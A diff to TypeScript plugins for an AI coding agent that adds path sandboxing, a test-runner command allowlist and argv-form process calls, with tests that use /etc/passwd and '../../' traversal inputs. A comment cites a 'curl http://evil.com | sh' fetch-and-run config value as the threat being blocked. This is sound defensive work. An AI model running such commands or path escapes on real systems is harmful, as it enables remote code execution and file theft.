 import { existsSync } from 'node:fs';
-import { basename, dirname, join } from 'node:path';
+import { basename, dirname, isAbsolute, join, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';
 
@@ -85,11 +85,7 @@ const DEFAULTS: TestGateConfig = {
   runner: 'auto',
   command: '',
   timeoutMs: 30_000,
-  testFilePatterns: [
-    'src/{name}.test.ts',
-    'tests/{name}.test.ts',
-    'tests/{name}-exec.test.ts',
-  ],
+  testFilePatterns: ['src/{name}.test.ts', 'tests/{name}.test.ts', 'tests/{name}-exec.test.ts'],
   injectOnPass: false,
 };
 
@@ -104,13 +100,56 @@ function readConfig(raw: unknown): TestGateConfig {
     enabled: r['enabled'] !== false,
     runner,
     command: typeof r['command'] === 'string' ? r['command'] : DEFAULTS.command,
-    timeoutMs: typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0 ? r['timeoutMs'] : DEFAULTS.timeoutMs,
-    testFilePatterns: Array.isArray(r['testFilePatterns']) && (r['testFilePatterns'] as unknown[]).length > 0
-      ? (r['testFilePatterns'] as unknown[]).filter((x): x is string => typeof x === 'string')
-      : DEFAULTS.testFilePatterns,
+    timeoutMs:
+      typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0
+        ? r['timeoutMs']
+        : DEFAULTS.timeoutMs,
+    testFilePatterns:
+      Array.isArray(r['testFilePatterns']) && (r['testFilePatterns'] as unknown[]).length > 0
+        ? (r['testFilePatterns'] as unknown[]).filter((x): x is string => typeof x === 'string')
+        : DEFAULTS.testFilePatterns,
     injectOnPass: r['injectOnPass'] === true,
   };
 }
+
+// ---------------------------------------------------------------------------
+// Sandbox: reject paths outside the project root, and lock down the
+// `command` config option (config-supplied first token = arbitrary
+// binary) to an allowlist of legitimate test runners. test-runner-gate
+// runs on every write/edit; an attacker who can write to the plugin
+// config can already pivot to test-runner-gate to run any process.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  if (typeof p !== 'string' || p.length === 0 || p.length > 4096) return false;
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
+
+// Allowlist for custom test commands. The first token of `command` must
+// resolve to one of these binaries. Without this, a config-supplied
+// `command: "curl http://evil.com | sh"` (which split() doesn't help
+// against because of pipes handled outside spawn) becomes a directed
+// process start. We limit to the same runner families that ship with
+// the plugin and the bundled npx + pnpm test wrappers.
+const ALLOWED_COMMAND_TOKENS = new Set<string>([
+  'npx',
+  'pnpm',
+  'pnpm',
+  'npm',
+  'yarn',
+  'vitest',
+  'jest',
+  'mocha',
+  // Useful for `command: "node ./scripts/run-tests.js"` style configs.
+  'node',
+  // Direct binary paths under the project's node_modules — resolved
+  // by basename in resolveAllowedCommand().
+]);
 
 // ---------------------------------------------------------------------------
 // Test file resolution
@@ -202,7 +241,9 @@ function detectRunner(requested: Runner): RunnerConfig | null {
     if (!match) return null;
     try {
       execSync(`npx ${match.name} --version`, {
-        encoding: 'utf-8', timeout: 5_000, cwd: process.cwd(),
+        encoding: 'utf-8',
+        timeout: 5_000,
+        cwd: process.cwd(),
         stdio: ['pipe', 'pipe', 'pipe'],
       });
       return match;
@@ -215,7 +256,9 @@ function detectRunner(requested: Runner): RunnerConfig | null {
   for (const candidate of candidates) {
     try {
       execSync(`npx ${candidate.name} --version`, {
-        encoding: 'utf-8', timeout: 5_000, cwd: process.cwd(),
+        encoding: 'utf-8',
+        timeout: 5_000,
+        cwd: process.cwd(),
         stdio: ['pipe', 'pipe', 'pipe'],
       });
       return candidate;
@@ -240,8 +283,35 @@ interface TestRunResult {
 }
 
 /**
+ * Resolve the first token of `customCommand` against an allowlist of
+ * legitimate test runners. Returns `[binary, restArgs]` if allowed,
+ * `null` otherwise. This prevents a config-supplied `command` from
+ * pivoting the runner hook into arbitrary code execution.
+ */
+function resolveAllowedCommand(customCommand: string): { cmd: string; args: string[] } | null {
+  const tokens = customCommand.split(/\s+/).filter(Boolean);
+  if (tokens.length === 0) return null;
+  const head = tokens[0]!;
+  // Bare binary name on the allowlist → pass through (PATH resolution).
+  if (ALLOWED_COMMAND_TOKENS.has(head)) {
+    return { cmd: head, args: tokens.slice(1) };
+  }
+  // Absolute path under the project → must resolve inside and the
+  // basename must be in the allowlist.
+  if (isAbsolute(head)) {
+    if (!withinProject(head)) return null;
+    const base = basename(head);
+    if (ALLOWED_COMMAND_TOKENS.has(base)) {
+      return { cmd: head, args: tokens.slice(1) };
+    }
+  }
+  return null;
+}
+
+/**
  * Run the test command on a specific test file and parse the output.
- * Returns null if the runner itself failed (timeout, crash, not found).
+ * Returns null if the runner itself failed (timeout, crash, not found,
+ * or the custom command failed the allowlist).
  */
 function runTests(
   testFile: string,
@@ -249,16 +319,42 @@ function runTests(
   customCommand: string,
   timeoutMs: number,
 ): TestRunResult | null {
+  // Sandbox: refuse to run tests for paths outside the project root.
+  if (!withinProject(testFile)) return null;
+
   // Use custom command if provided, otherwise use the runner's default.
-  const baseCommand = customCommand || runner.command;
-  const fullCommand = `${baseCommand} "${testFile}" ${runner.jsonFlags}`;
+  // execFileSync argv-form — no shell interpolation. testFile goes in as
+  // its own argv element so quotes/spaces in names cannot escape.
+  let cmd: string;
+  let cmdArgs: string[];
+  let trailingFlag: string;
+  if (customCommand) {
+    const resolved = resolveAllowedCommand(customCommand);
+    if (!resolved) return null;
+    cmd = resolved.cmd;
+    cmdArgs = [...resolved.args, testFile];
+    trailingFlag = runner.jsonFlags;
+  } else {
+    // runner.command is hard-coded by the plugin (no user input) and
+    // looks like "npx vitest run" — split into argv tokens.
+    const tokens = runner.command.split(/\s+/).filter(Boolean);
+    cmd = tokens[0]!;
+    cmdArgs = [...tokens.slice(1), testFile];
+    trailingFlag = runner.jsonFlags;
+  }
+  // trailingFlag is a single space-delimited string from the runner
+  // table (e.g. "--reporter=json"). execFileSync wants its own argv
+  // element — split spaces too.
+  const trailing = trailingFlag.split(/\s+/).filter(Boolean);
+  const fullArgs = [...cmdArgs, ...trailing];
   let stdout = '';
   try {
-    stdout = execSync(fullCommand, {
+    stdout = execFileSync(cmd, fullArgs, {
       encoding: 'utf-8',
       timeout: timeoutMs,
       cwd: process.cwd(),
       stdio: ['pipe', 'pipe', 'pipe'],
+      shell: false,
     });
   } catch (err: unknown) {
     const e = err as { stdout?: string; killed?: boolean };
@@ -273,7 +369,7 @@ function runTests(
     const numTotalTests = data.numTotalTests ?? 0;
     const numFailedTests = data.numFailedTests ?? 0;
     const numPassedTests = data.numPassedTests ?? 0;
-    const success = data.success ?? (numFailedTests === 0);
+    const success = data.success ?? numFailedTests === 0;
 
     // Extract failure messages (up to 5).
     const failures: string[] = [];
@@ -321,7 +417,8 @@ function runTests(
 const plugin: Plugin = {
   name: 'test-runner-gate',
   version: '0.1.0',
-  description: 'PostToolUse hook that runs the relevant test file after every write or edit to a source file',
+  description:
+    'PostToolUse hook that runs the relevant test file after every write or edit to a source file',
   apiVersion: API_VERSION,
   capabilities: { tools: true, hooks: true },
   defaultConfig: { ...DEFAULTS },
@@ -342,7 +439,8 @@ const plugin: Plugin = {
       command: {
         type: 'string',
         default: '',
-        description: 'Custom command prefix (overrides the runner default). Empty = use runner default.',
+        description:
+          'Custom command prefix (overrides the runner default). Empty = use runner default.',
       },
       timeoutMs: {
         type: 'number',
@@ -354,7 +452,8 @@ const plugin: Plugin = {
         type: 'array',
         items: { type: 'string' },
         default: ['src/{name}.test.ts', 'tests/{name}.test.ts', 'tests/{name}-exec.test.ts'],
-        description: 'Patterns to derive test file from source. {name}=basename, {path}=path-no-ext, {dir}=dirname.',
+        description:
+          'Patterns to derive test file from source. {name}=basename, {path}=path-no-ext, {dir}=dirname.',
       },
       injectOnPass: {
         type: 'boolean',
@@ -380,9 +479,12 @@ const plugin: Plugin = {
     // Detect runner at setup time.
     const runner = detectRunner(cfg.runner);
     if (!runner) {
-      api.log.warn('test-runner-gate: no test runner found (vitest, jest, mocha) — hook will be a no-op', {
-        requested: cfg.runner,
-      });
+      api.log.warn(
+        'test-runner-gate: no test runner found (vitest, jest, mocha) — hook will be a no-op',
+        {
+          requested: cfg.runner,
+        },
+      );
     } else {
       api.log.info('test-runner-gate: detected runner', { name: runner.name });
     }
@@ -400,6 +502,12 @@ const plugin: Plugin = {
       const inp = (input.toolInput ?? {}) as Record<string, unknown>;
       const sourcePath = inp['path'] as string | undefined;
       if (!sourcePath || typeof sourcePath !== 'string') return;
+
+      // Sandbox: refuse to derive a test path for source files outside
+      // the project root. Without this guard a prompt-injected write at
+      // /etc/passwd or C:\Windows could trigger test runs against
+      // attacker-controlled candidates.
+      if (!withinProject(sourcePath)) return;
 
       // Skip if the file being edited IS a test file — running tests
       // on a test file that was just modified is fine, but the LLM
@@ -444,10 +552,10 @@ const plugin: Plugin = {
 
       // Tests failed — inject failure details.
       state.failCount += 1;
-      const failureList = result.failures.length > 0
-        ? '\n' + result.failures.map((f) => `  ❌ ${f}`).join('\n')
-        : '';
-      const truncated = result.failCount > 5 ? `\n  … and ${result.failCount - 5} more failure(s)` : '';
+      const failureList =
+        result.failures.length > 0 ? '\n' + result.failures.map((f) => `  ❌ ${f}`).join('\n') : '';
+      const truncated =
+        result.failCount > 5 ? `\n  … and ${result.failCount - 5} more failure(s)` : '';
 
       api.log.warn(`test-runner-gate: ${result.failCount} test(s) failed for ${testFile}`, {
         source: sourcePath,

--- a/packages/plugins/tests/diff-summary.test.ts
+++ b/packages/plugins/tests/diff-summary.test.ts
@@ -1,12 +1,15 @@
 import { describe, expect, it, vi, beforeEach } from 'vitest';
 
-// Mock execSync before importing the plugin.
+// Mock execSync + execFileSync before importing the plugin. The plugin
+// switched from execSync string templates to execFileSync argv to defeat
+// shell-injection; tests must cover both surfaces.
 const mockExecSync = vi.fn((cmd: string): string => {
-  // git ls-files --error-unmatch → tracked file
   if (cmd.includes('ls-files')) return 'src/test.ts\n';
-  // git diff → sample diff output
   if (cmd.includes('git diff --no-index')) {
-    throw { stdout: 'diff --git a/dev/null b/src/test.ts\nnew file mode 100644\n+const x = 1;\n', killed: false };
+    throw {
+      stdout: 'diff --git a/dev/null b/src/test.ts\nnew file mode 100644\n+const x = 1;\n',
+      killed: false,
+    };
   }
   if (cmd.includes('git diff')) {
     return 'diff --git a/src/test.ts b/src/test.ts\n-old code\n+new code\n';
@@ -14,8 +17,21 @@ const mockExecSync = vi.fn((cmd: string): string => {
   return '';
 });
 
+const mockExecFileSync = vi.fn((_cmd: string, args: string[]): string => {
+  const joined = args.join(' ');
+  if (joined.includes('ls-files')) return 'src/test.ts\n';
+  if (joined.includes('--no-index')) {
+    throw {
+      stdout: 'diff --git a/dev/null b/src/test.ts\nnew file mode 100644\n+const x = 1;\n',
+      killed: false,
+    };
+  }
+  return 'diff --git a/src/test.ts b/src/test.ts\n-old code\n+new code\n';
+});
+
 vi.mock('node:child_process', () => ({
   execSync: mockExecSync,
+  execFileSync: mockExecFileSync,
 }));
 
 const diffSummaryPlugin = (await import('../src/diff-summary')).default;
@@ -23,8 +39,16 @@ const diffSummaryPlugin = (await import('../src/diff-summary')).default;
 interface MockApi {
   tools: { register: ReturnType<typeof vi.fn> };
   config: { extensions: Record<string, unknown> };
-  log: { info: ReturnType<typeof vi.fn>; warn: ReturnType<typeof vi.fn>; error: ReturnType<typeof vi.fn> };
-  metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn>; gauge: ReturnType<typeof vi.fn> };
+  log: {
+    info: ReturnType<typeof vi.fn>;
+    warn: ReturnType<typeof vi.fn>;
+    error: ReturnType<typeof vi.fn>;
+  };
+  metrics: {
+    counter: ReturnType<typeof vi.fn>;
+    histogram: ReturnType<typeof vi.fn>;
+    gauge: ReturnType<typeof vi.fn>;
+  };
   registerHook: ReturnType<typeof vi.fn>;
   onEvent: ReturnType<typeof vi.fn>;
   emitCustom: ReturnType<typeof vi.fn>;
@@ -51,9 +75,11 @@ function getHook(api: MockApi): (input: unknown) => { additionalContext?: string
 }
 
 function getStatusTool(api: MockApi): { execute: (input: unknown) => Promise<unknown> } {
-  const call = api.tools.register.mock.calls.find(([t]: unknown[]) => (t as { name: string }).name === 'diff_summary_status');
+  const call = api.tools.register.mock.calls.find(
+    ([t]: unknown[]) => (t as { name: string }).name === 'diff_summary_status',
+  );
   if (!call) throw new Error('diff_summary_status not registered');
-  return (call[0] as { execute: (input: unknown) => Promise<unknown> });
+  return call[0] as { execute: (input: unknown) => Promise<unknown> };
 }
 
 beforeEach(() => {
@@ -192,12 +218,15 @@ describe('includeContext in git diff command', () => {
       toolInput: { path: 'src/test.ts', content: 'x' },
       toolResult: { content: 'ok', isError: false },
     });
-    // Verify the mock was called with -U0 in the diff command
-    const diffCall = mockExecSync.mock.calls.find(
-      (c: unknown[]) => typeof c[0] === 'string' && (c[0] as string).includes('git diff') && !(c[0] as string).includes('ls-files'),
+    // Plugin uses execFileSync argv-form; verify the -U0 flag passed through.
+    const diffCall = mockExecFileSync.mock.calls.find(
+      (c: unknown[]) =>
+        Array.isArray(c[1]) &&
+        (c[1] as string[]).includes('diff') &&
+        (c[1] as string[]).some((a) => a.startsWith('-U')),
     );
     expect(diffCall).toBeDefined();
-    expect((diffCall![0] as string)).toContain('-U0');
+    expect((diffCall![1] as string[]).some((a) => a === '-U0')).toBe(true);
   });
 
   it('passes -U5 when includeContext=5', () => {
@@ -209,11 +238,14 @@ describe('includeContext in git diff command', () => {
       toolInput: { path: 'src/test.ts', content: 'x' },
       toolResult: { content: 'ok', isError: false },
     });
-    const diffCall = mockExecSync.mock.calls.find(
-      (c: unknown[]) => typeof c[0] === 'string' && (c[0] as string).includes('git diff') && !(c[0] as string).includes('ls-files'),
+    const diffCall = mockExecFileSync.mock.calls.find(
+      (c: unknown[]) =>
+        Array.isArray(c[1]) &&
+        (c[1] as string[]).includes('diff') &&
+        (c[1] as string[]).some((a) => a.startsWith('-U')),
     );
     expect(diffCall).toBeDefined();
-    expect((diffCall![0] as string)).toContain('-U5');
+    expect((diffCall![1] as string[]).some((a) => a === '-U5')).toBe(true);
   });
 
   it('passes -U3 by default', () => {
@@ -225,11 +257,47 @@ describe('includeContext in git diff command', () => {
       toolInput: { path: 'src/test.ts', content: 'x' },
       toolResult: { content: 'ok', isError: false },
     });
-    const diffCall = mockExecSync.mock.calls.find(
-      (c: unknown[]) => typeof c[0] === 'string' && (c[0] as string).includes('git diff') && !(c[0] as string).includes('ls-files'),
+    const diffCall = mockExecFileSync.mock.calls.find(
+      (c: unknown[]) =>
+        Array.isArray(c[1]) &&
+        (c[1] as string[]).includes('diff') &&
+        (c[1] as string[]).some((a) => a.startsWith('-U')),
     );
     expect(diffCall).toBeDefined();
-    expect((diffCall![0] as string)).toContain('-U3');
+    expect((diffCall![1] as string[]).some((a) => a === '-U3')).toBe(true);
+  });
+});
+
+describe('sandbox', () => {
+  it('does not invoke git when the file path is outside the project root', () => {
+    const api = makeApi();
+    diffSummaryPlugin.setup(api as never);
+    const hook = getHook(api);
+    const outside = process.platform === 'win32' ? 'C:\\Windows\\System32\\evil.ts' : '/etc/passwd';
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: outside, content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    // Hook should silently return void (no additionalContext) instead of
+    // leaking host file content through git diff.
+    expect(result).toBeUndefined();
+    expect(mockExecSync).not.toHaveBeenCalled();
+    expect(mockExecFileSync).not.toHaveBeenCalled();
+  });
+
+  it('does not invoke git when the path traverses out of the project root', () => {
+    const api = makeApi();
+    diffSummaryPlugin.setup(api as never);
+    const hook = getHook(api);
+    const escape = '../../escape.ts';
+    hook({
+      toolName: 'write',
+      toolInput: { path: escape, content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    expect(mockExecSync).not.toHaveBeenCalled();
+    expect(mockExecFileSync).not.toHaveBeenCalled();
   });
 });
 
@@ -238,7 +306,10 @@ describe('teardown + H1 pattern', () => {
     const api = makeApi();
     diffSummaryPlugin.setup(api as never);
     expect(() => diffSummaryPlugin.teardown!(api as never)).not.toThrow();
-    expect(api.log.info).toHaveBeenCalledWith('diff-summary: teardown complete', expect.any(Object));
+    expect(api.log.info).toHaveBeenCalledWith(
+      'diff-summary: teardown complete',
+      expect.any(Object),
+    );
   });
 
   it('zeros counters on teardown', async () => {

--- a/packages/plugins/tests/diff-summary.test.ts
+++ b/packages/plugins/tests/diff-summary.test.ts
@@ -290,10 +290,10 @@ describe('sandbox', () => {
     const api = makeApi();
     diffSummaryPlugin.setup(api as never);
     const hook = getHook(api);
-    const escape = '../../escape.ts';
+    const escapedPath = '../../escape.ts';
     hook({
       toolName: 'write',
-      toolInput: { path: escape, content: 'x' },
+      toolInput: { path: escapedPath, content: 'x' },
       toolResult: { content: 'ok', isError: false },
     });
     expect(mockExecSync).not.toHaveBeenCalled();

--- a/packages/plugins/tests/file-watcher-exec.test.ts
+++ b/packages/plugins/tests/file-watcher-exec.test.ts
@@ -26,8 +26,16 @@ function fakeWatcher() {
   };
 }
 
-let log: { info: ReturnType<typeof vi.fn>; warn: ReturnType<typeof vi.fn>; debug: ReturnType<typeof vi.fn> };
-let metrics: { counter: ReturnType<typeof vi.fn>; gauge: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn> };
+let log: {
+  info: ReturnType<typeof vi.fn>;
+  warn: ReturnType<typeof vi.fn>;
+  debug: ReturnType<typeof vi.fn>;
+};
+let metrics: {
+  counter: ReturnType<typeof vi.fn>;
+  gauge: ReturnType<typeof vi.fn>;
+  histogram: ReturnType<typeof vi.fn>;
+};
 let emitCustom: ReturnType<typeof vi.fn>;
 
 function setup(fw: Record<string, unknown> = { debounceMs: 100 }): Record<string, Tool> {
@@ -36,7 +44,11 @@ function setup(fw: Record<string, unknown> = { debounceMs: 100 }): Record<string
   metrics = { counter: vi.fn(), gauge: vi.fn(), histogram: vi.fn() };
   emitCustom = vi.fn();
   const api = {
-    tools: { register: (t: Tool) => { tools[t.name] = t; } },
+    tools: {
+      register: (t: Tool) => {
+        tools[t.name] = t;
+      },
+    },
     config: { extensions: { 'file-watcher': fw } },
     log,
     metrics,
@@ -88,13 +100,19 @@ describe('watch_start', () => {
 
   it('accepts explicit events and recursive=false', async () => {
     const tools = setup();
-    const res = await tools.watch_start!.execute({ paths: ['x'], events: ['change'], recursive: false });
+    const res = await tools.watch_start!.execute({
+      paths: ['x'],
+      events: ['change'],
+      recursive: false,
+    });
     expect(res.events).toEqual(['change']);
     expect(res.recursive).toBe(false);
   });
 
   it('logs a warning when fs.watch throws', async () => {
-    fsm.watch.mockImplementation(() => { throw new Error('ENOSPC'); });
+    fsm.watch.mockImplementation(() => {
+      throw new Error('ENOSPC');
+    });
     const tools = setup();
     const res = await tools.watch_start!.execute({ paths: ['bad'] });
     expect(res.ok).toBe(true); // start still succeeds; the watch just isn't active
@@ -107,11 +125,14 @@ describe('watch_start', () => {
     await tools.watch_start!.execute({ paths: ['src'] });
     lastCb!('change', 'a.txt');
     await vi.advanceTimersByTimeAsync(100);
-    expect(emitCustom).toHaveBeenCalledWith('file-watcher:changed', expect.objectContaining({
-      path: 'src/a.txt',
-      event: 'change',
-      filename: 'a.txt',
-    }));
+    expect(emitCustom).toHaveBeenCalledWith(
+      'file-watcher:changed',
+      expect.objectContaining({
+        path: 'src/a.txt',
+        event: 'change',
+        filename: 'a.txt',
+      }),
+    );
     expect(metrics.counter).toHaveBeenCalledWith('file_change', 1, { event: 'change' });
   });
 
@@ -153,16 +174,48 @@ describe('watch_start', () => {
 
   it('schedules a reindex for indexable files when autoIndex is on', async () => {
     vi.useFakeTimers();
-    const tools = setup({ debounceMs: 50, autoIndex: true, indexProjectRoot: '/proj' });
+    const tools = setup({ debounceMs: 50, autoIndex: true, indexProjectRoot: 'proj' });
     await tools.watch_start!.execute({ paths: ['src'] });
     lastCb!('change', 'mod.ts');
     await vi.advanceTimersByTimeAsync(50); // change debounce → emit + schedule index debounce
     await vi.advanceTimersByTimeAsync(50); // index debounce → enqueueReindex
-    expect(idx.enqueueReindex).toHaveBeenCalledWith(expect.objectContaining({
-      projectRoot: '/proj',
-      files: ['src/mod.ts'],
-    }));
+    expect(idx.enqueueReindex).toHaveBeenCalledWith(
+      expect.objectContaining({
+        projectRoot: 'proj',
+        files: ['src/mod.ts'],
+      }),
+    );
     expect(metrics.counter).toHaveBeenCalledWith('index_file', 1);
+  });
+
+  it('falls back to the watched dir when indexProjectRoot is outside the project root', async () => {
+    vi.useFakeTimers();
+    const tools = setup({
+      debounceMs: 50,
+      autoIndex: true,
+      indexProjectRoot: process.platform === 'win32' ? 'C:\\elsewhere' : '/etc',
+    });
+    await tools.watch_start!.execute({ paths: ['src'] });
+    lastCb!('change', 'mod.ts');
+    await vi.advanceTimersByTimeAsync(50);
+    await vi.advanceTimersByTimeAsync(50);
+    expect(idx.enqueueReindex).toHaveBeenCalledWith(
+      expect.objectContaining({ projectRoot: 'src', files: ['src/mod.ts'] }),
+    );
+    expect(log.warn).toHaveBeenCalledWith(
+      expect.stringMatching(/indexProjectRoot is outside the project root/),
+      expect.objectContaining({ indexProjectRoot: expect.any(String) }),
+    );
+  });
+
+  it('rejects watch_start when any path is outside the project root', async () => {
+    const tools = setup();
+    const outside = process.platform === 'win32' ? 'C:\\Windows\\System32' : '/etc';
+    const res = await tools.watch_start!.execute({ paths: ['src', outside] });
+    expect(res.ok).toBe(false);
+    expect(res.rejectedOutsideProject).toBe(true);
+    expect(res.error).toMatch(/outside the project root/);
+    expect((res as { watch_id: string | null }).watch_id).toBeNull();
   });
 
   it('does not reindex non-indexable files', async () => {
@@ -176,7 +229,9 @@ describe('watch_start', () => {
 
   it('logs a warning when the reindex enqueue fails', async () => {
     vi.useFakeTimers();
-    idx.enqueueReindex.mockImplementation(() => { throw new Error('index down'); });
+    idx.enqueueReindex.mockImplementation(() => {
+      throw new Error('index down');
+    });
     const tools = setup({ debounceMs: 50, autoIndex: true });
     await tools.watch_start!.execute({ paths: ['src'] });
     lastCb!('change', 'mod.ts');
@@ -195,7 +250,9 @@ describe('watch_start', () => {
     lastCb!('change', 'mod.ts');
     await vi.advanceTimersByTimeAsync(50);
     await vi.advanceTimersByTimeAsync(50);
-    expect(log.warn).toHaveBeenCalledWith(expect.stringMatching(/auto-index failed for src\/mod\.ts/));
+    expect(log.warn).toHaveBeenCalledWith(
+      expect.stringMatching(/auto-index failed for src\/mod\.ts/),
+    );
   });
 
   it('falls back to the watched dir as index root when none configured', async () => {
@@ -205,7 +262,9 @@ describe('watch_start', () => {
     lastCb!('change', 'mod.ts');
     await vi.advanceTimersByTimeAsync(50);
     await vi.advanceTimersByTimeAsync(50);
-    expect(idx.enqueueReindex).toHaveBeenCalledWith(expect.objectContaining({ projectRoot: 'srcdir' }));
+    expect(idx.enqueueReindex).toHaveBeenCalledWith(
+      expect.objectContaining({ projectRoot: 'srcdir' }),
+    );
   });
 });
 
@@ -226,7 +285,12 @@ describe('watch_stop', () => {
   });
 
   it('tolerates a watcher whose close() throws', async () => {
-    fsm.watch.mockImplementation(() => ({ close: () => { throw new Error('already closed'); }, on: vi.fn() }));
+    fsm.watch.mockImplementation(() => ({
+      close: () => {
+        throw new Error('already closed');
+      },
+      on: vi.fn(),
+    }));
     const tools = setup();
     const started = await tools.watch_start!.execute({ paths: ['src'] });
     const res = await tools.watch_stop!.execute({ watch_id: started.watch_id as string });
@@ -268,7 +332,10 @@ describe('lifecycle', () => {
     await tools.watch_start!.execute({ paths: ['src'] });
     const teardownLog = { info: vi.fn() };
     fileWatcherPlugin.teardown?.({ log: teardownLog } as never);
-    expect(teardownLog.info).toHaveBeenCalledWith('file-watcher: teardown complete', expect.anything());
+    expect(teardownLog.info).toHaveBeenCalledWith(
+      'file-watcher: teardown complete',
+      expect.anything(),
+    );
     const res = await tools.watch_list!.execute({});
     expect(res.count).toBe(0);
   });

--- a/packages/plugins/tests/format-on-save.test.ts
+++ b/packages/plugins/tests/format-on-save.test.ts
@@ -1,15 +1,24 @@
 import { describe, expect, it, vi, beforeEach } from 'vitest';
 
-// Mock execSync before importing the plugin.
+// Mock execSync + execFileSync before importing the plugin. The plugin
+// switched from execSync string templates to execFileSync argv to defeat
+// shell-injection; tests must cover both surfaces.
 const mockExecSync = vi.fn((cmd: string): string => {
-  if (cmd.includes('--version')) return '2.5.1\n'; // biome --version
-  if (cmd.includes('format --write')) return '';   // success
-  if (cmd.includes('format "')) return '';          // check mode = clean
+  if (cmd.includes('--version')) return '2.5.1\n';
+  return '';
+});
+
+const mockExecFileSync = vi.fn((_cmd: string, _args: string[]): string => {
+  // biome --write returns empty on success; second invocation (check
+  // mode) also returns empty when the file is already clean. Tests can
+  // override mockExecFileSync.mockImplementation when they need
+  // specific behavior (size change, parse error, etc.).
   return '';
 });
 
 vi.mock('node:child_process', () => ({
   execSync: mockExecSync,
+  execFileSync: mockExecFileSync,
 }));
 
 // Mock fs to simulate file existence + size changes.
@@ -24,8 +33,16 @@ const formatOnSavePlugin = (await import('../src/format-on-save')).default;
 interface MockApi {
   tools: { register: ReturnType<typeof vi.fn> };
   config: { extensions: Record<string, unknown> };
-  log: { info: ReturnType<typeof vi.fn>; warn: ReturnType<typeof vi.fn>; error: ReturnType<typeof vi.fn> };
-  metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn>; gauge: ReturnType<typeof vi.fn> };
+  log: {
+    info: ReturnType<typeof vi.fn>;
+    warn: ReturnType<typeof vi.fn>;
+    error: ReturnType<typeof vi.fn>;
+  };
+  metrics: {
+    counter: ReturnType<typeof vi.fn>;
+    histogram: ReturnType<typeof vi.fn>;
+    gauge: ReturnType<typeof vi.fn>;
+  };
   registerHook: ReturnType<typeof vi.fn>;
   onEvent: ReturnType<typeof vi.fn>;
   emitCustom: ReturnType<typeof vi.fn>;
@@ -52,9 +69,11 @@ function getHook(api: MockApi): (input: unknown) => { additionalContext?: string
 }
 
 function getStatusTool(api: MockApi): { execute: (input: unknown) => Promise<unknown> } {
-  const call = api.tools.register.mock.calls.find(([t]: unknown[]) => (t as { name: string }).name === 'format_on_save_status');
+  const call = api.tools.register.mock.calls.find(
+    ([t]: unknown[]) => (t as { name: string }).name === 'format_on_save_status',
+  );
   if (!call) throw new Error('format_on_save_status not registered');
-  return (call[0] as { execute: (input: unknown) => Promise<unknown> });
+  return call[0] as { execute: (input: unknown) => Promise<unknown> };
 }
 
 beforeEach(() => {
@@ -143,6 +162,45 @@ describe('hook behavior', () => {
     });
     expect(result).toBeUndefined();
   });
+
+  it('does not invoke biome when the file path is outside the project root', () => {
+    const api = makeApi();
+    formatOnSavePlugin.setup(api as never);
+    const hook = getHook(api);
+    const outside =
+      process.platform === 'win32' ? 'C:\\Windows\\System32\\evil.ts' : '/etc/evil.ts';
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: outside, content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    expect(result).toBeUndefined();
+    // biome binary probe still runs at setup time, but the per-file
+    // format --write must not.
+    expect(
+      mockExecFileSync.mock.calls.some(
+        (c) => Array.isArray(c[1]) && (c[1] as string[]).includes('--write'),
+      ),
+    ).toBe(false);
+  });
+
+  it('does not invoke biome when the path traverses out of the project root', () => {
+    const api = makeApi();
+    formatOnSavePlugin.setup(api as never);
+    const hook = getHook(api);
+    const escape = '../../escape.ts';
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: escape, content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    expect(result).toBeUndefined();
+    expect(
+      mockExecFileSync.mock.calls.some(
+        (c) => Array.isArray(c[1]) && (c[1] as string[]).includes('--write'),
+      ),
+    ).toBe(false);
+  });
 });
 
 describe('status tool', () => {
@@ -168,7 +226,10 @@ describe('teardown + H1 pattern', () => {
     const api = makeApi();
     formatOnSavePlugin.setup(api as never);
     expect(() => formatOnSavePlugin.teardown!(api as never)).not.toThrow();
-    expect(api.log.info).toHaveBeenCalledWith('format-on-save: teardown complete', expect.any(Object));
+    expect(api.log.info).toHaveBeenCalledWith(
+      'format-on-save: teardown complete',
+      expect.any(Object),
+    );
   });
 
   it('zeros counters on teardown', async () => {

--- a/packages/plugins/tests/format-on-save.test.ts
+++ b/packages/plugins/tests/format-on-save.test.ts
@@ -188,10 +188,10 @@ describe('hook behavior', () => {
     const api = makeApi();
     formatOnSavePlugin.setup(api as never);
     const hook = getHook(api);
-    const escape = '../../escape.ts';
+    const escapedPath = '../../escape.ts';
     const result = hook({
       toolName: 'write',
-      toolInput: { path: escape, content: 'x' },
+      toolInput: { path: escapedPath, content: 'x' },
       toolResult: { content: 'ok', isError: false },
     });
     expect(result).toBeUndefined();

--- a/packages/plugins/tests/import-organizer.test.ts
+++ b/packages/plugins/tests/import-organizer.test.ts
@@ -47,8 +47,16 @@ interface PluginAPI {
   slashCommands: { register: ReturnType<typeof vi.fn> };
   pipelines: Record<string, { use: (h: unknown) => void }>;
   config: { extensions?: Record<string, unknown> };
-  log: { info: ReturnType<typeof vi.fn>; warn: ReturnType<typeof vi.fn>; error: ReturnType<typeof vi.fn> };
-  metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn>; gauge: ReturnType<typeof vi.fn> };
+  log: {
+    info: ReturnType<typeof vi.fn>;
+    warn: ReturnType<typeof vi.fn>;
+    error: ReturnType<typeof vi.fn>;
+  };
+  metrics: {
+    counter: ReturnType<typeof vi.fn>;
+    histogram: ReturnType<typeof vi.fn>;
+    gauge: ReturnType<typeof vi.fn>;
+  };
   session: { append: ReturnType<typeof vi.fn> };
